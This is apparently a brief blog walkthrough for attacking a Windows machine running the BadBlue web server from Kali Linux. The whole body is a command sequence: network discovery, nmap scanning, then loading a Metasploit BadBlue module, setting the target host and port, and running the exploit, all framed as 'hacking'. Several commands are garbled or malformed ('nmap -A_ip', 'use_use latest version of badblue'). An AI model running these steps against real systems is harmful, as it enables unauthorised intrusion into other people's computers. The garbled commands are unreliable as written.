Windows Hacking (Exploitation Using Badblue) in Kali Linux





Windows Exploitation using Badblue:-



= netdiscover                         //info-gathering.



= nmap -A_ip                          //scanning to check port status.



= msfconsole                         //launch metasploit framework.



= search badblue                    //check badblue version.



= use_use latest version of badblue //path wich is exploitable.



= show option                         //check module options.



= set RHOST _target ip          //set target ip address.



= set RPORT _target port no//set target port .



= show options                        //cross check about module options.



= exploit                                     //exploit windows.

Comments

Popular posts from this blog

How to View Map on Terminal Of KALI LINUX

KATANA FRAMEWORK in KALI LINUX (Penetration Testing script)